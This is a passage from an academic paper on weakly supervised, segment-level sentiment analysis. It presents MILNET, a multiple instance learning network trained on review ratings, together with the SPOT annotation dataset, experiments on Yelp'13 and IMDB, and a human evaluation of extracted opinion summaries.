labels, and learns to predict the sentiment of text seg- ments, i.e. sentences or elementary discourse units (EDUs), without segment-level supervi- sion. We introduce an attention-based polar- ity scoring method for identifying positive and negative text snippets and a new dataset which we call SPOT (as shorthand for Segment-level POlariTy annotations) for evaluating MIL- style sentiment models like ours. Experimen- tal results demonstrate superior performance against multiple baselines, whereas a judge- ment elicitation study shows that EDU-level opinion extraction produces more informative summaries than sentence-based alternatives. 1 Introduction Sentiment analysis has become a fundamental area of research in Natural Language Processing thanks to the proliferation of user-generated content in the form of online reviews, blogs, internet forums, and social media. A plethora of methods have been pro- posed in the literature that attempt to distill senti- ment information from text, allowing users and ser- vice providers to make opinion-driven decisions. The success of neural networks in a variety of ap- plications (Bahdanau et al., 2015; Le and Mikolov, 2014; Socher et al., 2013) and the availability of large amounts of labeled data have led to an in- creased focus on sentiment classification. Super- vised models are typically trained on documents (Johnson and Zhang, 2015a; Johnson and Zhang, 2015b; Tang et al., 2015; Yang et al., 2016), sen- tences (Kim, 2014), or phrases (Socher et al., 2011; [Rating: ??] I had a very mixed experience at The Stand. The burger and fries were good. The chocolate shake was divine: rich and creamy. The drive-thru was horrible. It took us at least 30 minutes to order when there were only four cars in front of us. We complained about the wait and got a half–hearted apology. I would go back because the food is good, but my only hesitation is the wait. S um m ar y + The burger and fries were good + The chocolate shake was divine + I would go back because the food is good – The drive-thru was horrible – It took us at least 30 minutes to order Figure 1: An EDU-based summary of a 2-out-of-5 star review with positive and negative snippets. Socher et al., 2013) annotated with sentiment la- bels and used to predict sentiment in unseen texts. Coarse-grained document-level annotations are rel- atively easy to obtain due to the widespread use of opinion grading interfaces (e.g., star ratings ac- companying reviews). In contrast, the acquisition of sentence- or phrase-level sentiment labels re- mains a laborious and expensive endeavor despite its relevance to various opinion mining applica- tions, e.g., detecting or summarizing consumer opin- ions in online product reviews. The usefulness of finer-grained sentiment analysis is illustrated in the example of Figure 1, where snippets of opposing po- larities are extracted from a 2-star restaurant review. Although, as a whole, the review conveys negative sentiment, aspects of the reviewer’s experience were clearly positive. This goes largely unnoticed when focusing solely on the review’s overall rating. In this work, we consider the problem of segment- level sentiment analysis from the perspective of Multiple Instance Learning (MIL; Keeler, 1991). 17 Transactions of the Association for Computational Linguistics, vol. 6, pp. 17–31, 2018. Action Editor: Ani Nenkova. Submission batch: 7/17; Revision batch: 11/2017; Published 1/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Instead of learning from individually labeled seg- ments, our model only requires document-level su- pervision and learns to introspectively judge the sen- timent of constituent segments. Beyond showing how to utilize document collections of rated reviews to train fine-grained sentiment predictors, we also investigate the granularity of the extracted segments. Previous research (Tang et al., 2015; Yang et al., 2016; Cheng and Lapata, 2016; Nallapati et al., 2017) has predominantly viewed documents as se- quences of sentences. Inspired by recent work in summarization (Li et al., 2016) and sentiment clas- sification (Bhatia et al., 2015), we also represent documents via Rhetorical Structure Theory’s (Mann and Thompson, 1988) Elementary Discourse Units (EDUs). Although definitions for EDUs vary in the literature, we follow standard practice and take the elementary units of discourse to be clauses (Carlson et al., 2003). We employ a state-of-the-art discourse parser (Feng and Hirst, 2012) to identify them. Our contributions in this work are three-fold: a novel multiple instance learning neural model which utilizes document-level sentiment supervision to judge the polarity of its constituent segments; the creation of SPOT, a publicly available dataset which contains Segment-level POlariTy annotations (for sentences and EDUs) and can be used for the eval- uation of MIL-style models like ours; and the em- pirical finding (through automatic and human-based evaluation) that neural multiple instance learning is superior to more conventional neural architectures and other baselines on detecting segment sentiment and extracting informative opinions in reviews.1 2 Background Our work lies at the intersection of multiple research areas, including sentiment classification, opinion mining and multiple instance learning. We review related work in these areas below. Sentiment Classification Sentiment classification is one of the most popular tasks in sentiment anal- ysis. Early work focused on unsupervised meth- ods and the creation of sentiment lexicons (Turney, 2002; Hu and Liu, 2004; Wiebe et al., 2005; Bac- cianella et al., 2010) based on which the overall po- 1Our code and SPOT dataset are publicly available at: https://github.com/stangelid/milnet-sent larity of a text can be computed (e,g., by aggregating the sentiment scores of constituent words). More re- cently, Taboada et al. (2011) introduced SO-CAL, a state-of-the-art method that combines a rich senti- ment lexicon with carefully defined rules over syn- tax trees to predict sentence sentiment. Supervised learning techniques have subse- quently dominated the literature (Pang et al., 2002; Pang and Lee, 2005; Qu et al., 2010; Xia and Zong, 2010; Wang and Manning, 2012; Le and Mikolov, 2014) thanks to user-generated sentiment labels or large-scale crowd-sourcing efforts (Socher et al., 2013). Neural network models in particular have achieved state-of-the-art performance on vari- ous sentiment classification tasks due to their abil- ity to alleviate feature engineering. Kim (2014) introduced a very successful CNN architecture for sentence-level classification, whereas other work (Socher et al., 2011; Socher et al., 2013) uses recur- sive neural networks to learn sentiment for segments of varying granularity (i.e., words, phrases, and sen- tences). We describe Kim’s (2014) approach in more detail as it is also used as part of our model. Let xi denote a k-dimensional word embedding of the i-th word in text segment s of length n. The segment’s input representation is the concatenation of word embeddings x1, . . . , xn, resulting in word matrix X. Let Xi:i+j refer to the concatenation of embeddings xi, . . . , xi+j. A convolution filter W ∈ Rlk, applied to a window of l words, produces a new feature ci = ReLU(W ◦ Xi:i+l + b), where ReLU is the Rectified Linear Unit non-linearity, ‘◦’ denotes the entrywise product followed by a sum over all elements and b ∈ R is a bias term. Ap- plying the same filter to every possible window of word vectors in the segment, produces a feature map c = [c1, c2, . . . , cn−l+1]. Multiple feature maps for varied window sizes are applied, resulting in a fixed-size segment representation v via max-over- time pooling. We will refer to the application of con- volution to an input word matrix X, as CNN(X). A final sentiment prediction is produced using a soft- max classifier and the model is trained via back- propagation using sentence-level sentiment labels. The availability of large-scale datasets (Diao et al., 2014; Tang et al., 2015) has also led to the de- velopment of document-level sentiment classifiers which exploit hierarchical neural representations. 18 These are obtained by first building representations of sentences and aggregating those into a document feature vector (Tang et al., 2015). Yang et al. (2016) further acknowledge that words and sentences are deferentially important in different contexts. They present a model which learns to attend (Bahdanau et al., 2015) to individual text parts when constructing document representations. We describe such an ar- chitecture in more detail as we use it as a point of comparison with our own model. Given document d comprising segments (s1, . . . , sm), a Hierarchical Network with at- tention (henceforth HIERNET; based on Yang et al., 2016) produces segment representations (v1, . . . , vm) which are subsequently fed into a bidirectional GRU module (Bahdanau et al., 2015), whose resulting hidden vectors (h1, . . . , hm) are used to produce attention weights (a1, . . . , am) (see Section 3.2 for more details on the attention mechanism). A document is represented as the weighted average of the segments’ hidden vec- tors vd = ∑ i aihi. A final sentiment prediction is obtained using a softmax classifier and the model is trained via back-propagation using document-level sentiment labels. The architecture is illustrated in Figure 2(a). In their proposed model, Yang et al. (2016) use bidirectional GRU modules to represent segments as well as documents, whereas we use a more efficient CNN encoder to compose words into segment vectors2 (i.e., vi = CNN(Xi)). Note that models like HIERNET do not naturally predict sentiment for individual segments; we discuss how they can be used for segment-level opinion extraction in Section 5.2. Our own work draws inspiration from represen- tation learning (Tang et al., 2015; Kim, 2014), es- pecially the idea that not all parts of a document convey sentiment-worthy clues (Yang et al., 2016). Our model departs from previous approaches in that it provides a natural way of predicting the polar- ity of individual text segments without requiring segment-level annotations. Moreover, our atten- tion mechanism directly facilitates opinion detection rather than simply aggregating sentence representa- tions into a single document vector. 2When applied to the YELP’13 and IMDB document clas- sification datasets, the use of CNNs results in a relative perfor- mance decrease of < 2% compared Yang et al’s model (2016). Opinion Mining A standard setting for opinion mining and summarization (Lerman et al., 2009; Carenini et al., 2006; Ganesan et al., 2010; Di Fab- brizio et al., 2014; Gerani et al., 2014) assumes a set of documents that contain opinions about some en- tity of interest (e.g., camera). The goal of the system is to generate a summary that is representative of the average opinion and speaks to its important aspects (e.g., picture quality, battery life, value). Output summaries can be extractive (Lerman et al., 2009) or abstractive (Gerani et al., 2014; Di Fabbrizio et al., 2014) and the underlying systems exhibit vary- ing degrees of linguistic sophistication from identi- fying aspects (Lerman et al., 2009) to using RST- style discourse analysis, and manually defined tem- plates (Gerani et al., 2014; Di Fabbrizio et al., 2014). Our proposed method departs from previous work in that it focuses on detecting opinions in individ- ual documents. Given a review, we predict the po- larity of every segment, allowing for the extrac- tion of sentiment-heavy opinions. We explore the usefulness of EDU segmentation inspired by Li et al. (2016), who show that EDU-based summaries align with near-extractive summaries constructed by news editors. Importantly, our model is trained in a weakly-supervised fashion on large scale docu- ment classification datasets without recourse to fine- grained labels or gold-standard opinion summaries. Multiple Instance Learning Our models adopt a Multiple Instance Learning (MIL) framework. MIL deals with problems where labels are associated with groups of instances or bags (documents in our case), while instance labels (segment-level polarities) are unobserved. An aggregation function is used to combine instance predictions and assign labels on the bag level. The goal is either to label bags (Keeler and Rumelhart, 1992; Dietterich et al., 1997; Maron and Ratan, 1998) or to simultaneously infer bag and instance labels (Zhou et al., 2009; Wei et al., 2014; Kotzias et al., 2015). We view segment-level senti- ment analysis as an instantiation of the latter variant. Initial MIL efforts for binary classification made the strong assumption that a bag is negative only if all of its instances are negative, and positive oth- erwise (Dietterich et al., 1997; Maron and Ratan, 1998; Zhang et al., 2002; Andrews and Hofmann, 2004; Carbonetto et al., 2008). Subsequent work re- 19 laxed this assumption, allowing for prediction com- binations better suited to the tasks at hand. Wei- dmann et al. (2003) introduced a generalized MIL framework, where a combination of instance types is required to assign a bag label. Zhou et al. (2009) used graph kernels to aggregate predictions, exploit- ing relations between instances in object and text categorization. Xu and Frank (2004) proposed a multiple-instance logistic regression classifier where instance predictions were simply averaged, assum- ing equal and independent contribution toward bag classification. More recently, Kotzias et al. (2015) used sentence vectors obtained by a pre-trained hi- erarchical CNN (Denil et al., 2014) as features un- der an unweighted average MIL objective. Predic- tion averaging was further extended by Pappas and Popescu-Belis (2014; 2017), who used a weighted summation of predictions, an idea which we also adopt in our work. Applications of MIL are many and varied. MIL was first explored by Keeler and Rumelhart (1992) for recognizing handwritten post codes, where the position and value of individual digits was unknown. MIL techniques have since been applied to drug ac- tivity prediction (Dietterich et al., 1997), image re- trieval (Maron and Ratan, 1998; Zhang et al., 2002), object detection (Zhang et al., 2006; Carbonetto et al., 2008; Cour et al., 2011), text classification (An- drews and Hofmann, 2004), image captioning (Wu et al., 2015), paraphrase detection (Xu et al., 2014), and information extraction (Hoffmann et al., 2011). When applied to sentiment analysis, MIL takes advantage of supervision signals on the document level in order to train segment-level sentiment pre- dictors. Although their work is not couched in the framework of MIL, Täckström and McDonald (2011) show how sentence sentiment labels can be learned as latent variables from document-level an- notations using hidden conditional random fields. Pappas and Popescu-Belis (2014) use a multiple in- stance regression model to assign sentiment scores to specific aspects of products. The Group-Instance Cost Function (GICF), proposed by Kotzias et al. (2015), averages sentence sentiment predictions dur- ing trainng, while ensuring that similar sentences receive similar polarity labels. Their work uses a pre-trained hierarchical CNN to obtain sentence em- beddings, but is not trainable end-to-end, in contrast with our proposed network. Additionally, none of the aforementioned efforts explicitly evaluate opin- ion extraction quality. 3 Methodology In this section we describe how multiple instance learning can be used to address some of the draw- backs seen in previous approaches, namely the need for expert knowledge in lexicon-based sentiment analysis (Taboada et al., 2011), expensive fine- grained annotation on the segment level (Kim, 2014; Socher et al., 2013) or the inability to naturally pre- dict segment sentiment (Yang et al., 2016). 3.1 Problem Formulation Under multiple instance learning (MIL), a dataset D is a collection of labeled bags, each of which is a group of unlabeled instances. Specifically, each document d is a sequence (bag) of segments (in- stances). This sequence d = (s1, s2, . . . , sm) is ob- tained from a document segmentation policy (see Section 4 for details). A discrete sentiment label yd ∈ [1, C] is associated with each document, where the labelset is ordered and classes 1 and C corre- spond to maximally negative and maximally posi- tive sentiment. It is assumed that yd is an unknown function of the unobserved segment-level labels: yd = f(y1, y2, . . . , ym) (1) Probabilistic sentiment classifiers will produce document-level predictions ŷd by selecting the most probable class according to class distribution pd = 〈p(1)d , . . . , p (C) d 〉. In a non-MIL framework a classifier would learn to predict the document’s sen- timent by directly conditioning on its segments’ fea- ture representations or their aggregate: pd = f̂θ(v1, v2, . . . , vm) (2) In contrast, a MIL classifier will produce a class dis- tribution pi for each segment and additionally learn to combine these into a document-level prediction: pi = ĝθs(vi) , (3) pd = f̂θd(p1, p2, . . . , pm) . (4) In this work, ĝ and f̂ are defined using a single neu- ral network, described below. 20 Figure 2: A Hierarchical Network (HIERNET) for document-level sentiment classification and our proposed Multiple Instance Learning Network (MILNET). The models use the same attention mechanism to combine segment vectors and predictions respectively. 3.2 Multiple Instance Learning Network Hierarchical neural models like HIERNET have been used to predict document-level polarity by first en- coding sentences and then combining these repre- sentations into a document vector. Hierarchical vec- tor composition produces powerful sentiment pre- dictors, but lacks the ability to introspectively judge the polarity of individual segments. Our Multiple Instance Learning Network (hence- forth MILNET) is based on the following intuitive assumptions about opinionated text. Each segment conveys a degree of sentiment polarity, ranging from very negative to very positive. Additionally, seg- ments have varying degrees of importance, in rela- tion to the overall opinion of the author. The overar- ching polarity of a text is an aggregation of segment polarities, weighted by their importance. Thus, our model attempts to predict the polarity of segments and decides which parts of the document are good indicators of its overall sentiment, allowing for the detection of sentiment-heavy opinions. An illustra- tion of MILNET is shown in Figure 2(b); the model consists of three components: a CNN segment en- coder, a softmax segment classifier and an attention- based prediction weighting module. Segment Encoding An encoding vi = CNN(Xi) is produced for each segment, using the CNN archi- tecture described in Section 2. Segment Classification Obtaining a separate rep- resentation vi for every segment in a document al- lows us to produce individual segment sentiment predictions pi = 〈p(1)i , . . . , p (C) i 〉. This is achieved using a softmax classifier: pi = softmax(Wcvi + bc) , (5) where Wc and bc are the classifier’s parameters, shared across all segments. Individual distributions pi are shown in Figure 2(b) as small bar-charts. Document Classification In the simplest case, document-level predictions can be produced by taking the average of segment class distributions: p (c) d = 1/m ∑ i p (c) i , c ∈ [1, C]. This is, however, a crude way of combining segment sentiment, as not all parts of a document convey important sentiment clues. We opt for a segment attention mechanism which rewards text units that are more likely to be good sentiment predictors. Our attention mechanism is based on a bidirec- tional GRU component (Bahdanau et al., 2015) and 21 The starters were quite bland. I didn’t enjoy most of them, but the burger was brilliant! 1 2 3 4 5 0.00 0.25 0.50 0.75 p ro b a b il it y att: 0.3 polarity −1 0 1 gtd-pol. 1 2 3 4 5 att: 0.2 −1 0 1 1 2 3 4 5 att: 0.5 −1 0 1 Figure 3: Polarity scores (bottom) obtained from class probability distributions for three EDUs (top) ex- tracted from a restaurant review. Attention weights (top) are used to fine-tune the obtained polarities. inspired by Yang et al. (2016). However, in con- trast to their work, where attention is used to com- bine sentence representations into a single document vector, we utilize a similar technique to aggregate individual sentiment predictions. We first use separate GRU modules to produce forward and backward hidden vectors, which are then concatenated: −→ h i = −−−→ GRU(vi), (6) ←− h i = ←−−− GRU(vi), (7) hi = [ −→ h i, ←− h i], i ∈ [1, m] . (8) The importance of each segment is measured with the aid of a vector ha, as follows: h′i = tanh(Wahi + ba) , (9) ai = exp(h′Ti ha)∑ i exp(h ′T i ha) , (10) where Equation (9) defines a one-layer MLP that produces an attention vector for the i-th segment. Attention weights ai are computed as the normal- ized similarity of each h′i with ha. Vector ha, which is randomly initialized and learned during training, can be thought of as a trained key, able to recognize sentiment-heavy segments. The attention mecha- nism is depicted in the dashed box of Figure 2, with attention weights shown as shaded circles. Finally, we obtain a document-level distribution over sentiment labels as the weighted sum of seg- ment distributions (see top of Figure 2(b)): p (c) d = ∑ i aip (c) i , c ∈ [1, C] . (11) Training The model is trained end-to-end on doc- uments with user-generated sentiment labels. We use the negative log likelihood of the document-level prediction as an objective function: L = − ∑ d log p (yd) d (12) 4 Polarity-based Opinion Extraction After training, our model can produce segment-level sentiment predictions for unseen texts in the form of class probability distributions. A direct application of our method is opinion extraction, where highly positive and negative snippets are selected from the original document, producing extractive sentiment summaries, as described below. Polarity Scoring In order to extract opinion sum- maries, we need to rank segments according to their sentiment polarity. We introduce a method that takes our model’s confidence in the prediction into ac- count, by reducing each segment’s class probability distribution pi to a single real-valued polarity score. To achieve this, we first define a real-valued class weight vector w = 〈w(1), . . . , w(C) |w(c) ∈ [−1, 1]〉 that assigns uniformly-spaced weights to the ordered labelset, such that w(c+1) −w(c) = 2 C−1 . For exam- ple, in a 5-class scenario, the class weight vector would be w = 〈−1,−0.5, 0, 0.5, 1〉. We compute the polarity score of a segment as the dot-product of the probability distribution pi with vector w: polarity(si) = ∑ c p (c) i w (c) ∈ [−1, 1] (13) Gated Polarity As a way of increasing the effec- tiveness of our method, we introduce a gated exten- sion that uses the attention mechanism of our model to further differentiate between segments that carry 22 significant sentiment cues and those that do not: gated-polarity(si) = ai ·polarity(si) , (14) where ai is the attention weight assigned to the i-th segment. This forces the polarity scores of segments the model does not attend to closer to 0. An illustration of our polarity scoring function is provided in Figure 3, where the class predic- tions (top) of three restaurant review segments are mapped to their corresponding polarity scores (bot- tom). We observe that our method produces the de- sired result; segments 1 and 2 convey negative senti- ment and receive negative scores, whereas the third segment is mapped to a positive score. Although the same discrete class label is assigned to the first two, the second segment’s score is closer to 0 (neutral) as its class probability mass is more evenly distributed. Segmentation Policies As mentioned earlier, one of the hypotheses investigated in this work regards the use of subsentential units as the basis of extrac- tion. Specifically, our model was applied to sen- tences and Elementary Discourse Units (EDUs), ob- tained from a Rhetorical Structure Theory (RST) parser (Feng and Hirst, 2012). According to RST, documents are first segmented into EDUs corre- sponding roughly to independent clauses which are then recursively combined into larger discourse spans. This results in a tree representation of the document, where connected nodes are characterized by discourse relations. We only utilize RST’s seg- mentation, and leave the potential use of the tree structure to future work. The example in Figure 3 illustrates why EDU- based segmentation might be beneficial for opinion extraction. The second and third EDUs correspond to the sentence: I didn’t enjoy most of them, but the burger was brilliant. Taken as a whole, the sentence conveys mixed sentiment, whereas the EDUs clearly convey opposing sentiment. 5 Experimental Setup In this section we describe the data used to assess the performance of our model. We also give details on model training and comparison systems. Yelp’13 IMDB Documents 335,018 348,415 Average #Sentences 8.90 14.02 Average #EDUs 19.11 37.38 Average #Words 152 325 Vocabulary Size 211,245 115,831 Classes 1–5 1–10 Table 1: Document-level sentiment classification datasets used to train our models. Yelp’13seg IMDBseg Sent. EDUs Sent. EDUs #Segments 1,065 2,110 1,029 2,398 #Documents 100 97 Classes {– , 0 , +} {– , 0 , +} Table 2: SPOT dataset: numbers of documents and segments with polarity annotations. 5.1 Datasets Our models were trained on two large-scale senti- ment classification collections. The Yelp’13 corpus was introduced in Tang et al. (2015) and contains customer reviews of local businesses, each associ- ated with human ratings on a scale from 1 (negative) to 5 (positive). The IMDB corpus of movie reviews was obtained from Diao et al. (2014); each review is associated with user ratings ranging from 1 to 10. Both datasets are split into training (80%), validation (10%) and test (10%) sets. A summary of statistics for each collection is provided in Table 1. In order to evaluate model performance on the segment level, we constructed a new dataset named SPOT (as a shorthand for Segment POlariTy) by annotating documents from the Yelp’13 and IMDB collections. Specifically, we sampled reviews from each collection such that all document-level classes are represented uniformly, and the document lengths are representative of the respective corpus. Docu- ments were segmented into sentences and EDUs, re- sulting in two segment-level datasets per collection. Statistics are summarized in Table 2. Each review was presented to three Amazon Me- chanical Turk (AMT) annotators who were asked to judge the sentiment conveyed by each segment (i.e., sentence or EDU) as negative, neutral, or pos- 23 1 2 3 4 5 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 p ro p o rt io n o f se g m e n ts Yelp'13 - Sentences 1 2 3 4 5 Yelp'13 - EDUs negative neutral positive 1 2 3 4 5 6 7 8 9 10 document class 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 p ro p o rt io n o f se g m e n ts IMDB - Sentences 1 2 3 4 5 6 7 8 9 10 document class IMDB - EDUs Figure 4: Distribution of segment-level labels per document-level class on our the SPOT datasets. itive. We assigned labels using a majority vote or a fourth annotator in the rare cases of no agreement (< 5%). Figure 4 shows the distribution of segment labels for each document-level class. As expected, documents with positive labels contain a larger num- ber of positive segments compared to documents with negative labels and vice versa. Neutral seg- ments are distributed in an approximately uniform manner across document classes. Interestingly, the proportion of neutral EDUs is significantly higher compared to neutral sentences. The observation re- inforces our argument in favor of EDU segmenta- tion, as it suggests that a sentence with positive or negative overall polarity may still contain neutral EDUs. Discarding neutral EDUs, could therefore lead to more concise opinion extraction compared to relying on entire sentences. We further experimented on two collections intro- duced by Kotzias et al. (2015) which also originate from the YELP’13 and IMDB datasets. Each collec- tion consists of 1,000 randomly sampled sentences annotated with binary sentiment labels. 5.2 Model Comparison On the task of segment classification we compared MILNET, our multiple instance learning network, against the following methods: Majority: Majority class applied to all instances. SO-CAL: State-of-the-art lexicon-based system that classifies segments into positive, neutral, and negative classes (Taboada et al., 2011). Seg-CNN: Fully-supervised CNN segment classi- fier trained on SPOT’s labels (Kim, 2014). GICF: The Group-Instance Cost Function model introduced in Kotzias et al. (2015). This is an unweighted average prediction aggregation MIL method that uses sentence features from a pre- trained convolutional neural model. HIERNET: HIERNET does not explicitly generate individual segment predictions. Segment polarity scores are obtained by assigning the document- level prediction to every segment. We can then produce finer-grained polarity distinctions via gating, using the model’s attention weights. We further illustrate the differences between HI- ERNET and MILNET in Figure 5, which includes short descriptions and simplified equations for each model. MILNET naturally produces distinct seg- ment polarities, while HIERNET assigns a single po- larity score to every segment. In both cases, gating is a further means of identifying neutral segments. Finally, we differentiate between variants of HI- ERNET and MILNET according to: Polarity source: Controls whether we assign polar- ities via segment-specific or document-wide pre- dictions. HIERNET only allows for document- wide predictions. MILNET can use both. Attention: We use models without gating (no sub- script), with gating (gt subscript) as well as mod- els trained with the attention mechanism disabled, falling back to simple averaging (avg subscript). 5.3 Model Training and Evaluation We trained MILNET and HIERNET using Adadelta (Zeiler, 2012) for 25 epochs. Mini-batches of 200 documents were organized based on the reviews’ segment and document lengths so the amount of padding was minimized. We used 300-dimensional pre-trained word2vec embeddings. We tuned hyper- parameters on the validation sets of the document classification collections, resulting in the follow- ing configuration (unless otherwise noted). For the CNN segment encoder, we used window sizes of 3, 4 24 Figure 5: System pipelines for HIERNET and MILNET showing 4 distinct phases for sentiment analysis. and 5 words with 100 feature maps per window size, resulting in 300-dimensional segment vectors. The GRU hidden vector dimensions for each direction were set to 50 and the attention vector dimension- ality to 100. We used L2-normalization and dropout to regularize the softmax classifiers and additional dropout on the internal GRU connections. Real-valued polarity scores produced by the two models are mapped to discrete labels using two ap- propriate thresholds t1 , t2 ∈ [−1, 1], so that a seg- ment s is classified as negative if polarity(s) < t1, positive if polarity(s) > t2 or neutral otherwise.3 To evaluate performance, we use macro-averaged F1 which is unaffected by class imbalance. We select optimal thresholds using 10-fold cross-validation and report mean scores across folds. The fully-supervised convolutional segment clas- sifier (Seg-CNN) uses the same window size and feature map configuration as our segment encoder. Seg-CNN was trained on SPOT using segment la- bels directly and 10-fold cross-validation (identical folds as in our main models). Seg-CNN is not di- rectly comparable to MILNET (or HIERNET) due to differences in supervision type (segment vs. docu- ment labels) and training size (1K-2K segment la- bels vs. ∼250K document labels). However, the 3The discretization of polarities is only used for evaluation purposes and is not necessary for summary extraction, where we only need a relative ranking of segments. comparison is indicative of the utility of fine-grained sentiment predictors that do not rely on expensive segment-level annotations. 6 Results We evaluated models in two ways. We first assessed their ability to classify segment polarity in reviews using the newly created SPOT dataset and, addition- ally, the sentence corpora of Kotzias et al. (2015). Our second suite of experiments focused on opin- ion extraction: we conducted a judgment elicita- tion study to determine whether extracts produced by MILNET are useful and of higher quality com- pared to HIERNET and other baselines. We were also interested to find out whether EDUs provide a better basis for opinion extraction than sentences. 6.1 Segment Classification Table 3 summarizes our results. The first block in the table reports the performance of the majority class baseline. The second block considers mod- els that do not utilize segment-level predictions, namely HIERNET which assigns polarity scores to segments using its document-level predictions, as well as the variant of MILNET which similarly uses document-level predictions only (Equation (11)). In the third block, MILNET’s segment-level predic- tions are used. Each block further differentiates be- tween three levels of attention integration, as previ- 25 Method Yelp’13seg IMDBseg Sent EDU Sent EDU Majority 19.02† 17.03† 18.32† 21.52† D oc um en t HIERNETavg 54.21† 50.90† 46.99† 49.02† HIERNET 55.33† 51.43† 48.47† 49.70† HIERNETgt 56.64† 58.75 62.12 57.38† MILNETavg 58.43† 48.63† 53.40† 51.81† MILNET 52.73† 53.59† 48.75† 47.18† MILNETgt 59.74† 59.47 61.83† 58.24† Se gm MILNETavg 51.79† 46.77† 45.69† 38.37† MILNET 61.41 59.58 59.99† 57.71† MILNETgt 63.35 59.85 63.97 59.87 SO-CAL 56.53† 58.16† 53.21† 60.40 Seg-CNN 56.18† 59.96 58.32† 62.95† Table 3: Segment classification results (in macro- averaged F1). † indicates that the system in question is significantly different from MILNETgt (approxi- mate randomization test (Noreen, 1989), p < 0.05). ously described. The final block shows the perfor- mance of SO-CAL and the Seg-CNN classifier. When considering models that use document- level supervision, MILNET with gated, segment- specific polarities obtains the best classification per- formance across all four datasets. Interestingly, it performs comparably to Seg-CNN, the fully- supervised segment classifier, which provides addi- tional evidence that MILNET can effectively iden- tify segment polarity without the need for segment- level annotations. Our model also outperforms the strong SO-CAL baseline in all but one datasets which is remarkable given the expert knowledge and linguistic information used to develop the lat- ter. Document-level polarity predictions result in lower classification performance across the board. Differences between the standard hierarchical and multiple instance networks are less pronounced in this case, as MILNET loses the advantage of produc- ing segment-specific sentiment predictions. Models without attention perform worse in most cases. The use of gated polarities benefits all model configura- tions, indicating the method’s ability to selectively focus on segments with significant sentiment cues. We further analyzed the polarities assigned by MILNET and HIERNET to positive, negative, and Neutral Segments Non-Gtd Gated Se nt HIERNET 4.67 36.60 MILNET 39.61 44.60 Non-Gtd Gated E D U HIERNET 2.39 55.38 MILNET 52.10 56.60 Table 4: F1 scores for neutral segments (Yelp’13). Method Yelp IMDB GICF 86.3 86.0 GICFHN 92.9 86.5 GICFMN 93.2 91.0 MILNET 94.0 91.9 Table 5: Accuracy scores on the sentence classi- fication datasets intro- duced in Kotzias et al. (2015). −1 0 1 0.0 0.2 0.4 0.6 0.8 1.0 1.2 1.4 1.6 negative −1 0 1 HierNet neutral −1 0 1 positive −1 0 1 0.0 0.2 0.4 0.6 0.8 1.0 1.2 1.4 1.6 −1 0 1 polarity MILNet −1 0 1 Figure 6: Distribution of predicted polarity scores across three classes (Yelp’13 sentences). neutral segments. Figure 6 illustrates the distribu- tion of polarity scores produced by the two mod- els on the Yelp’13 dataset (sentence segmentation). In the case of negative and positive sentences, both models demonstrate appropriately skewed distribu- tions. However, the neutral class appears to be par- ticularly problematic for HIERNET, where polarity scores are scattered across a wide range of values. In contrast, MILNET is more successful at identify- ing neutral sentences, as its corresponding distribu- tion has a single mode near zero. Attention gating addresses this issue by moving the polarity scores of sentiment-neutral segments towards zero. This is illustrated in Table 4 where we observe that gated variants of both models do a better job at identify- ing neutral segments. The effect is very significant for HIERNET, while MILNET benefits slightly and remains more effective overall. Similar trends were observed in all four SPOT datasets. In order to examine the effect of training size, we trained multiple models using subsets of the original document collections. We trained on five random 26 40 45 50 55 60 65 70 m a c ro -f 1 Yelp Sentences Yelp EDUS 0 50000 100000 150000 200000 250000 training size 40 45 50 55 60 65 70 m a c ro -f 1 IMDB Sentences 0 50000 100000 150000 200000 250000 training size IMDB EDUS MILNet HierNet Seg-CNN Figure 7: Performance of HIERNETgt and MILNETgt for varying training sizes. subsets for each training size, ranging from 100 doc- uments to the full training set, and tested segment classification performance on SPOT. The results, av- eraged across trials, are presented in Figure 7. With the exception of the IMDB EDU-segmented dataset, MILNET only requires a few thousand training doc- uments to outperform the supervised Seg-CNN. HI- ERNET follows a similar curve, but is inferior to MILNET. A reason for MILNET’s inferior perfor- mance on the IMDB corpus (EDU-split) can be low- quality EDUs, due to the noisy and informal style of language used in IMDB reviews. Finally, we compared MILNET against the GICF model (Kotzias et al., 2015) on their Yelp and IMDB sentence sentiment datasets.4 Their model re- quires sentence embeddings from a pre-trained neu- ral model. We used the hierarchical CNN from their work (Denil et al., 2014) and, additionally, pre-trained HIERNET and MILNET sentence em- beddings. The results in Table 5 show that MILNET outperforms all variants of GIFC. Our models also seem to learn better sentence embeddings, as they improve GICF’s performance on both collections. 4GICF only handles binary labels, which makes it unsuitable for the full-scale comparisons in Table 3. Here, we binarize our training datasets and use same-sized sentence embeddings for all four models (R150 for Yelp, R72 for IMDB). Method Informativeness Polarity Coherence HIERNETsent 43.7 33.6 43.5 MILNETsent 45.7 36.7 44.6 Unsure 10.7 29.6 11.8 HIERNETedu 34.2† 28.0† 48.4 MILNETedu 53.3 61.1 45.0 Unsure 12.5 11.0 6.6 MILNETsent 35.7† 33.4† 70.4† MILNETedu 55.0 51.5 23.7 Unsure 9.3 15.2 5.9 LEAD 34.0 19.0† 40.3 RANDOM 22.9† 19.6† 17.8† MILNETedu 37.4 46.9 33.3 Unsure 5.7 14.6 8.6 Table 6: Human evaluation results (in percentages). † indicates that the system in question is signifi- cantly different from MILNET (sign-test, p < 0.01). 6.2 Opinion Extraction In our opinion extraction experiments, AMT work- ers (all native English speakers) were shown an original review and a set of extractive, bullet-style summaries, produced by competing systems using a 30% compression rate. Participants were asked to decide which summary was best according to three criteria: Informativeness (Which summary best cap- tures the salient points of the review?), Polarity (Which summary best highlights positive and neg- ative comments?) and Coherence (Which summary is more coherent and easier to read?). Subjects were allowed to answer “Unsure” in cases where they could not discriminate between summaries. We used all reviews from our SPOT dataset and collected three responses per document. We ran four judg- ment elicitation studies: one comparing HIERNET and MILNET when summarizing reviews segmented as sentences, a second one comparing the two mod- els with EDU segmentation, a third which compares EDU- and sentence-based summaries produced by MILNET, and a fourth where EDU-based sum- maries from MILNET were compared to a LEAD (the first N words from each document) and a RAN- DOM (random EDUs) baseline. Table 6 summarizes our results, showing the pro- portion of participants that preferred each system. The first block in the table shows a slight prefer- 27 [Rating: ????] As with any family-run hole in the wall, service can be slow. What the staff lacked in speed, they made up for in charm. The food was good, but nothing wowed me. I had the Pierogis while my friend had swedish meatballs. Both dishes were tasty, as were the sides. One thing that was disappointing was that the food was a a little cold (lukewarm). The restaurant itself is bright and clean. I will go back again when i feel like eating outside the box. E D U -b 